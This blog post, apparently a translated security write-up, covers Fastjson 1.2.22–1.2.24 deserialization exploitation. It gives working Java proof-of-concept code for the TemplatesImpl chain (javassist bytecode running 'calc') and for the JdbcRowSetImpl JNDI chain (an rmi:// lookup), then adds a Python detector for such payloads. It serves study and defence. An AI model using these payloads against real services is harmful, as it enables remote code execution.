FastJson Exploitation Chains

Last updated on September 27, 2024

Affected versions

Fastjson:1.2.22-1.2.24

Prerequisites

JDK 8, a Spring Boot project, plus the following dependencies:

<dependency>
    <groupId>org.javassist</groupId>
    <artifactId>javassist</artifactId>
    <version>3.28.0-GA</version>
</dependency>
<dependency>
    <groupId>com.alibaba</groupId>
    <artifactId>fastjson</artifactId>
    <version>1.2.24</version>
</dependency>

The application must call parseObject in the form JSON.parseObject(payload, Object.class, Feature.SupportNonPublicField)

or parse in the form JSON.parse(payload, Feature.SupportNonPublicField);

Exploitation methods

TemplatesImpl chain

Call chain

JSON::parseObject->DefaultJSONParser::parseObject->JavaObjectDeserializer::deserialze->DefaultJSONParser::parse->DefaultJSONParser::parseObject->JavaBeanDeserializer::deserialze->JavaBeanDeserializer::parseField->DefaultFieldDeserializer::parseField->FieldDeserializer::setValue->TemplatesImpl::getOutputProperties

From getOutputProperties onward it is the usual TemplatesImpl gadget chain.

package com.example.demo;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import javassist.ClassClassPath;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.apache.commons.codec.binary.Base64;

public class fastjsonTest {
    public static void main(String[] args) throws Exception {
        // Build a class "a" extending AbstractTranslet with javassist; its static
        // initializer runs when TemplatesImpl defines and instantiates the class.
        ClassPool pool = ClassPool.getDefault();
        pool.insertClassPath(new ClassClassPath(AbstractTranslet.class));
        CtClass cc = pool.makeClass("a");
        cc.setSuperclass(pool.get(AbstractTranslet.class.getName()));
        CtConstructor ctConstructor = cc.makeClassInitializer();
        ctConstructor.insertBefore("Runtime.getRuntime().exec(\"calc\");");
        byte[] code = cc.toBytecode();
        String code_base64 = Base64.encodeBase64String(code);
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        // _bytecodes is a private field, which is why Feature.SupportNonPublicField is
        // required; _outputProperties makes fastjson call getOutputProperties().
        // Note the mix of double and single quotes: fastjson accepts both.
        String payload =
            "{\"" +
            "@type\":\"" + NASTY_CLASS + "\"," + "\"" +
            "_bytecodes\":[\"" + code_base64 + "\"]," +
            "'_name':'aaa','" +
            "_tfactory':{ },\"" +
            "_outputProperties\":{ }," + "\"" +
            "_version\":\"1.0\",\"" +
            "allowedProtocols\":\"all\"}\n";
        ParserConfig config = new ParserConfig();
        Object obj = JSON.parseObject(payload, Object.class, config, Feature.SupportNonPublicField);
    }
}

https://www.cnblogs.com/akka1/p/16138460.html

JdbcRowSetImpl chain

This chain uses Fastjson deserialization to trigger JNDI injection and thereby command execution; the target must have outbound network access.

package com.example.demo;

import com.alibaba.fastjson.JSON;

public class JdbcRowSetImplTest {
    public static void main(String[] args) throws Exception {
        // Setting autoCommit after dataSourceName makes JdbcRowSetImpl connect,
        // which performs a JNDI lookup of the attacker-controlled dataSourceName.
        String PoC = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://127.0.0.1:1099/RCE\", \"autoCommit\":true}";
        JSON.parse(PoC);
    }
}

https://blog.csdn.net/weixin_43263451/article/details/125862793
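Both chains above arrive through the same door: an @type key in untrusted JSON naming a gadget class, plus a field (_bytecodes or dataSourceName) that carries the payload. The following detector is an added example, not code from this post, that a defender can run over request bodies or WAF/application logs before they reach JSON.parse/parseObject. It deliberately does not rely on json.loads(), because fastjson accepts single-quoted keys and strings (as the mixed-quote PoC shows) that a strict JSON parser rejects. The class map, sample documents and function names are constructed for this example.

```python
import re

# Gadget classes named on this page; a defender extends this map for other known gadgets.
GADGET_CLASSES = {
    "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl":
        "TemplatesImpl chain (javassist class bytecode in _bytecodes)",
    "com.sun.rowset.JdbcRowSetImpl":
        "JdbcRowSetImpl chain (JNDI lookup through dataSourceName)",
}

# fastjson tolerates single quotes, so strict json.loads() would reject the PoC and a
# parser-based detector would miss it; these patterns scan raw text and accept either quote.
_TYPE_KEY = re.compile(r"""["']@type["']\s*:\s*["']([^"']+)["']""")
_BYTECODES = re.compile(r"""["']_bytecodes["']\s*:\s*\[""")
_JNDI_URL = re.compile(
    r"""["']dataSourceName["']\s*:\s*["']((?:rmi|ldap|ldaps|iiop)://[^"']+)["']""", re.I)
_UNICODE_ESC = re.compile(r"\\u([0-9a-fA-F]{4})")

def normalize(text: str) -> str:
    """Decode JSON \\uXXXX escapes so matching runs on the characters fastjson will see."""
    return _UNICODE_ESC.sub(lambda m: chr(int(m.group(1), 16)), text)

def inspect_payload(text: str) -> list:
    """Return findings for one JSON document bound for JSON.parse/parseObject; [] if clean."""
    text = normalize(text)
    findings = []
    for m in _TYPE_KEY.finditer(text):
        cls = m.group(1)
        reason = GADGET_CLASSES.get(cls, "class name supplied by untrusted input (autoType)")
        findings.append(f"@type={cls}: {reason}")
    if _BYTECODES.search(text):
        findings.append("_bytecodes present: request carries serialized class bytecode")
    for m in _JNDI_URL.finditer(text):
        findings.append(f"dataSourceName is a JNDI URL: {m.group(1)}")
    return findings

# Constructed samples: the two PoC shapes from this page (bytecode replaced by "AAAA") and one benign document.
SAMPLES = {
    "templates": '{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",'
                 '"_bytecodes":["AAAA"],\'_name\':\'aaa\',\'_tfactory\':{ },'
                 '"_outputProperties":{ },"_version":"1.0","allowedProtocols":"all"}',
    "jdbc": '{"@type":"com.sun.rowset.JdbcRowSetImpl", '
            '"dataSourceName":"rmi://127.0.0.1:1099/RCE", "autoCommit":true}',
    "benign": '{"name":"alice","age":30}',
}

if __name__ == "__main__":
    for name, doc in SAMPLES.items():
        print(name, inspect_payload(doc) or "clean")
```

Any @type at all in input from outside is worth alerting on, since the fix for the versions listed here is to upgrade and to leave autoType disabled rather than to filter class names.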

Other fastjson exploitation methods

https://www.cnblogs.com/nice0e3/p/14776043.html

Author: fru1ts
Link: https://fru1ts.github.io/2024/09/02/FastJson%E5%88%A9%E7%94%A8%E9%93%BE/
License: this site uses the BY-SA license; unless otherwise stated, please credit the source when republishing.